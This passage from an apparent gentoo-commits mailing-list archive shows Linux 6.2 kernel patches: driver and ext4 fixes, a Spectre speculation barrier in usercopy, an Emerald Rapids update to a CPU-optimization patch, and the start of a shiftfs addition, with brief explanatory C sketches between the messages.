+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks)");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index ba3fff17e2f9f..f9c3b1033ec39 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ #include <linux/bpf_mem_alloc.h>
+ 
+ #include <asm/barrier.h>
+@@ -1910,9 +1911,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/lib/usercopy.c b/lib/usercopy.c
+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"


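The lib/usercopy.c hunk above is the interesting part of this patch: access_ok() can pass speculatively even when it fails architecturally, so barrier_nospec() is placed between the check and the copy. Below is a minimal, self-contained C sketch of that pattern; bounds_ok() and copy_raw() are hypothetical stand-ins for access_ok() and raw_copy_from_user(), and the no-op fallback mirrors the new nospec.h default.

#include <stddef.h>
#include <string.h>

#ifndef barrier_nospec
# define barrier_nospec() do { } while (0)	/* generic no-op fallback, as in the nospec.h hunk */
#endif

/* stand-in for access_ok(): the real check validates the user address range */
static int bounds_ok(const void *p, unsigned long n)
{
	return p != NULL && n > 0;
}

/* stand-in for raw_copy_from_user(): returns the number of bytes left uncopied */
static unsigned long copy_raw(void *to, const void *from, unsigned long n)
{
	memcpy(to, from, n);
	return 0;
}

static unsigned long guarded_copy(void *to, const void *from, unsigned long n)
{
	unsigned long res = n;

	if (bounds_ok(from, n)) {
		/*
		 * The branch can be entered speculatively even when
		 * bounds_ok() fails for real; the barrier keeps the copy
		 * from running under that misprediction.
		 */
		barrier_nospec();
		res = copy_raw(to, from, n);
	}
	return res;
}

With nospec.h now providing the empty default, the #ifdef CONFIG_X86 guard around the call site is no longer needed, which is exactly what the kernel/bpf/core.c hunk removes.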
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-26 17:30 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-26 17:30 UTC (permalink / raw
  To: gentoo-commits

commit:     8c1fb78fe361a6272a79e82f5da4d81fbc0407ed
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 17:29:05 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 17:29:05 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8c1fb78f

Update CPU Optimization patch, add Emerald Rapids, update Sapphire Rapids

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 125 ++++++++++++++------------
 1 file changed, 69 insertions(+), 56 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 0841340b..7a1b717a 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,7 +1,6 @@
-From a0825feea3f100656d58446885b5f190284fd219
+From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Fri, 4 Nov 2022 15:34:36 -0400
-Subject: [PATCH] more uarches for kernel 5.17+
+Date: Thu, 5 Jan 2023 14:29:37 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -50,11 +49,12 @@ CPU-specific microarchitectures include:
 • Intel Xeon (Cascade Lake)
 • Intel Xeon (Cooper Lake)*
 • Intel 3rd Gen 10nm++ i3/i5/i7/i9-family (Tiger Lake)*
-• Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
+• Intel 4th Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
 • Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
 • Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
+• Intel 5th Gen 10nm++ Xeon (Emerald Rapids)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
@@ -99,20 +99,19 @@ REFERENCES
 3.  https://bugzilla.kernel.org/show_bug.cgi?id=77461
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
-
 ---
- arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  43 +++-
- arch/x86/include/asm/vermagic.h |  72 ++++++
- 3 files changed, 514 insertions(+), 17 deletions(-)
+ arch/x86/Kconfig.cpu            | 427 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  44 +++-
+ arch/x86/include/asm/vermagic.h |  74 ++++++
+ 3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..08d887d1220d 100644
+index 542377cd419d..f589971df2d3 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
-
-
+ 
+ 
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,7 +120,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
-
+ 
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -130,7 +129,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
-
+ 
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +137,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
-
+ 
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -227,7 +226,7 @@ index 542377cd419d..08d887d1220d 100644
 +
 +config MZEN4
 +	bool "AMD Zen 4"
-+	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 160000)
 +	help
 +	  Select this for AMD Family 19h Zen 4 processors.
 +
@@ -238,26 +237,26 @@ index 542377cd419d..08d887d1220d 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
-
+ 
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
-
+ 
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
-
+ 
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +383,202 @@ config MATOM
+@@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
-
+ 
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -410,7 +409,7 @@ index 542377cd419d..08d887d1220d 100644
 +	select X86_P6_NOP
 +	help
 +
-+	  Select this for third-generation 10 nm process processors in the Sapphire Rapids family.
++	  Select this for fourth-generation 10 nm process processors in the Sapphire Rapids family.
 +
 +	  Enables -march=sapphirerapids
 +
@@ -453,14 +452,24 @@ index 542377cd419d..08d887d1220d 100644
 +	  Select this for fourteenth-generation processors in the Meteor Lake family.
 +
 +	  Enables -march=meteorlake
++
++config MEMERALDRAPIDS
++	bool "Intel Emerald Rapids"
++	depends on (CC_IS_GCC && GCC_VERSION > 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fifth-generation 10 nm process processors in the Emerald Rapids family.
++
++	  Enables -march=emeraldrapids
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +586,50 @@ config GENERIC_CPU
+@@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
-
+ 
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -506,9 +515,9 @@ index 542377cd419d..08d887d1220d 100644
 +	  Enables -march=native
 +
  endchoice
-
+ 
  config X86_GENERIC
-@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
@@ -519,23 +528,23 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
 +	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
-+	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
-+	|| GENERIC_CPU4
++	|| MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 \
++	|| GENERIC_CPU3 || GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
-
+ 
  config X86_F00F_BUG
  	def_bool y
-@@ -332,15 +676,27 @@ config X86_INVD_BUG
-
+@@ -332,15 +686,27 @@ config X86_INVD_BUG
+ 
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
-
+ 
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -543,8 +552,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
+ 
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -555,11 +564,11 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
@@ -567,8 +576,9 @@ index 542377cd419d..08d887d1220d 100644
 +	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
-+	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
-
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL)
+ 
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -578,9 +588,9 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
-+	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
-+	|| MNATIVE_AMD) || X86_64
-
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
+ 
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -590,8 +600,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -603,8 +613,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
+ 
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
@@ -619,20 +629,20 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
-
+ 
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
-
+ 
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index bafbd905e6e7..7fae52788560 100644
+index 415a5d138de4..17b1e039d955 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -150,8 +150,47 @@ else
+@@ -151,8 +151,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -676,17 +686,18 @@ index bafbd905e6e7..7fae52788560 100644
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
 +        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
 +        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
++        cflags-$(CONFIG_MEMERALDRAPIDS)	+= -march=emeraldrapids
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
-
+ 
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..18021e8c0c28 100644
+index 75884d2cdec3..02c1386eb653 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,52 @@
+@@ -17,6 +17,54 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -736,10 +747,12 @@ index 75884d2cdec3..18021e8c0c28 100644
 +#define MODULE_PROC_FAMILY "RAPTORLAKE "
 +#elif defined CONFIG_MMETEORLAKE
 +#define MODULE_PROC_FAMILY "METEORLAKE "
++#elif defined CONFIG_MEMERALDRAPIDS
++#define MODULE_PROC_FAMILY "EMERALDRAPIDS "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +81,32 @@
+@@ -35,6 +83,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -772,5 +785,5 @@ index 75884d2cdec3..18021e8c0c28 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
---
-2.38.1
+-- 
+2.39.0


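The vermagic.h part of this patch is what makes the new CPU choices matter at module-load time: MODULE_PROC_FAMILY feeds the vermagic string embedded in every module, which must match the running kernel. A simplified, compilable sketch of that mechanism, reduced to the newly added Emerald Rapids case (the printed release string is illustrative only, not taken from the patch):

#include <stdio.h>

#define CONFIG_MEMERALDRAPIDS 1	/* as selected via the new Kconfig.cpu entry */

#if defined CONFIG_MEMERALDRAPIDS
#define MODULE_PROC_FAMILY "EMERALDRAPIDS "
#else
#define MODULE_PROC_FAMILY "GENERIC "
#endif

int main(void)
{
	/* a module built under this config carries the family in its vermagic */
	printf("vermagic: 6.2.5 SMP " MODULE_PROC_FAMILY "\n");
	return 0;
}

A module stamped with one family will refuse to load on a kernel built for another, which is why the patch extends vermagic.h in lockstep with the Kconfig.cpu entries and the Makefile cflags.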
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-26 17:26 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-26 17:26 UTC (permalink / raw
  To: gentoo-commits

commit:     0f791c8b0640beaa02f75db270404c0d81ae7ec4
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 17:18:48 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 17:24:08 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0f791c8b

Add shiftfs

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 +
 5000_shiftfs-6.2-2023-01-31.patch | 6607 +++++++++++++++++++++++++++++++++++++
 2 files changed, 6611 insertions(+)

diff --git a/0000_README b/0000_README
index 46624397..ae528a67 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.2-2023-01-31.patch
+From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
+Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc >= v11.1 optimizations for additional CPUs.

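The shiftfs patch added below follows the two-step flow its commit message describes: real root first marks a subtree with the "mark" option, then a mount from inside a user namespace references the mark and sees shifted ids. A hedged usage sketch with mount(2); the paths are invented for illustration, and each step would run in its respective namespace:

#include <stdio.h>
#include <sys/mount.h>

int main(void)
{
	/* step 1: as real root, mark the subtree as shiftable */
	if (mount("/volumes/ctr-root", "/volumes/ctr-root", "shiftfs", 0, "mark"))
		perror("mark mount");

	/*
	 * step 2: from inside the container's user namespace, mount the
	 * marked subtree; the namespace's interior ids are what get
	 * written to the underlying filesystem.
	 */
	if (mount("/volumes/ctr-root", "/mnt", "shiftfs", 0, NULL))
		perror("shifted mount");

	return 0;
}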
diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch
new file mode 100644
index 00000000..44603abb
--- /dev/null
+++ b/5000_shiftfs-6.2-2023-01-31.patch
@@ -0,0 +1,6607 @@
+From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
+From: James Bottomley <James.Bottomley@HansenPartnership.com>
+Date: Thu, 4 Apr 2019 15:39:11 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+This allows any subtree to be uid/gid shifted and bound elsewhere.  It
+does this by operating similarly to overlayfs.  Its primary use is for
+shifting the underlying uids of filesystems used to support
+unprivileged (uid-shifted) containers.  The usual use case here is
